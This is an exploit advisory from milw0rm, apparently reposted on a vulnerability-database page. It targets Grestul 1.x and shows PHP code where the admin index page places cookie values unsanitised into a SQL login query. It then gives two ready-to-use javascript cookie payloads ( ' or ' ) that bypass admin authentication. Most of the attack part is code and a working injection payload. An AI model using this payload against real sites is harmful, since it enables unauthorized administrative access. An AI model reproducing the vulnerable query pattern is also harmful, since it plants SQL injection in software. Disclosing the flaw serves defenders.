N/A Grestul 1.x - Cookie Authentication Bypass-漏洞情报、漏洞详情、安全漏洞、CVE

########################################
Grestul Sql Injection By Cookie ( bypass)
########################################
Autore: x0r
Email: andry2000@hotmail.it
Site: http://w00tz0ne.org
########################################

Let's Go!

\admin\login.php :

$username = SafeAddSlashes($_POST['username']);
$passcode = SafeAddSlashes(md5($_POST['passcode']));
$time = time();
$check = SafeAddSlashes($_POST['setcookie']);

$query = "SELECT user, pass FROM grestullogin WHERE user = '$username' AND
pass = '$passcode'";
$result = mysql_query($query, $db);
if(mysql_num_rows($result)) {
$_SESSION['loggedin'] = 1;
	if($check) {
	setcookie("grestul[username]", $username, $time + 3600);
	setcookie("grestul[passcode]", $passcode, $time + 3600);

Oh damn ! SafeAddSlashes...our ' or ' don't go! But...\admin\index.php

if(isset($_COOKIE['grestul'])) {

include 'inc/config.php';

$username = $_COOKIE['grestul']['username'];
$passcode = $_COOKIE['grestul']['passcode'];

$query = "SELECT user, pass FROM grestullogin WHERE user = '$username' AND
pass = '$passcode'";
$result = mysql_query($query, $db);

So....

Exploit:

[+]javascript:document.cookie = "grestul[username]=' or '; path=/";
[+]javascript:document.cookie = "grestul[passcode]=' or '; path=/";

And then \admin\index.php ^ ^ Auth Bypassed ^ ^

################################################

w00t Z0ne - InfoSec Forums
    [ w00tZ0ne.org ]

# milw0rm.com [2009-02-16]

漏洞ID	1057455	漏洞类型
发布时间	2009-02-16	更新时间	2009-02-16
CVE编号	N/A	CNNVD-ID	N/A
漏洞平台	PHP	CVSS评分	N/A

Grestul 1.x - Cookie Authentication Bypass

|漏洞来源

|漏洞详情

|漏洞EXP

检索漏洞

相关漏洞